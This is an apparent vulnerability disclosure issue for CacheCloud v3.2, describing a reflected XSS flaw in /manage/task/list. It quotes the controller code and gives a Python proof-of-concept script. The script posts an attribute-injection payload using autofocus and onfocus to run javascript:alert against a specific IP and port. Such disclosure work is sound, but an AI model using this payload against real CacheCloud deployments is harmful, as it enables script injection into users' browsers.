XSS vulnerability on /manage/task/list #374
Description
XSS vulnerability on /manage/task/list
Summary
In the latest version (v3.2) of CacheCloud, the endpoint /manage/task/list does not encode user-controllable parameters when outputting them on web page, resulting in XSS vulnerability. This allows attackers to launch XSS attacks against users.
Details
- SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/TaskController.java#L40-L69
40: @RequestMapping({"/list"})
41: public ModelAndView taskQueueList(HttpServletRequest request, HttpServletResponse response, Model model, TaskSearch taskSearch) {
42: List<TaskQueue> taskQueueList = null;
43: Long searchTaskId = NumberUtils.toLong(request.getParameter("searchTaskId"));
44: int pageNo = NumberUtils.toInt(request.getParameter("pageNo"), 1);
45: int pageSize = NumberUtils.toInt(request.getParameter("pageSize"), 30);
46: if (searchTaskId != null && searchTaskId > 0L) {
47: taskQueueList = this.taskService.getTaskQueueTreeByTaskId(searchTaskId);
48: Page page = new Page(pageNo, pageSize, taskQueueList.size());
49: model.addAttribute("page", page);
50: taskSearch.setPage(page);
51: } else {
52: int totalCount = this.taskService.getTaskQueueCount(taskSearch);
53: Page page = new Page(pageNo, pageSize, totalCount);
54: model.addAttribute("page", page);
55: taskSearch.setPage(page);
56: taskQueueList = this.taskService.getTaskQueueList(taskSearch);
57: }
58:
59: for(TaskQueue taskQueue : taskQueueList) {
60: List<TaskStepFlow> taskStepFlowList = this.taskService.getTaskStepFlowList(taskQueue.getId());
61: taskQueue.setTaskStepFlowList(taskStepFlowList);
62: }
63:
64: model.addAttribute("searchTaskId", searchTaskId);
65: model.addAttribute("taskQueueList", taskQueueList);
66: model.addAttribute("taskActive", SuccessEnum.SUCCESS.value());
67: return new ModelAndView("manage/task/queueList");
68: }
69:
POC
import requests
from requests.sessions import Session
class CustomSession(Session):
def request(
self,
method,
url,
params = None,
data = None,
headers = None,
cookies = None,
files = None,
auth = None,
timeout = None,
allow_redirects = True,
proxies = None,
hooks = None,
stream = None,
verify = None,
cert = None,
json = None,
):
arg_names = (
'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
)
local_variables = locals()
local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
local_variables['headers'] = local_variables.get('headers') or dict()
local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'})
return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/manage/task/list'
payload = {'className': 'X" tabindex="1" autofOCUs ONfocus="location=\'javascript:alert("zast-xss")\'"//', 'searchTaskId': 0, 'pageNo': 1, 'pageSize': 30}
response = requests.post(url, data=payload, verify=False, allow_redirects=False)
print(f'Status Code: {response.status_code}')
print(f'Text: {response.text}')
# =================================== Poc End ====================================
- Screenshot
